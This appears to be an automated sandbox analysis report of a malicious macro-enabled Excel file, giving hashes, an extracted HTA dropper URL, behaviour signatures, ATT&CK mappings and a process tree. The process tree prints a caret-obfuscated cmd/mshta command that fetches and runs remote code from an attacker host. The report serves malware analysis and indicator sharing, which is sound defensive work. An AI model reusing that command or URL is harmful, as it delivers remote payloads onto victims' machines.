Analysis

  • max time kernel
    151s
  • max time network
    131s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 10:02

General

  • Target

    bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm

  • Size

    114KB

  • MD5

    254ffcdec7238f1444fe24932ce54457

  • SHA1

    f279f9375c94edc055cb29d3d511c2b984eea05a

  • SHA256

    bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc

  • SHA512

    559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        PID:4500

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2272-115-0x00007FFE71400000-0x00007FFE71410000-memory.dmp
    Filesize

    64KB

  • memory/2272-116-0x00007FFE71400000-0x00007FFE71410000-memory.dmp
    Filesize

    64KB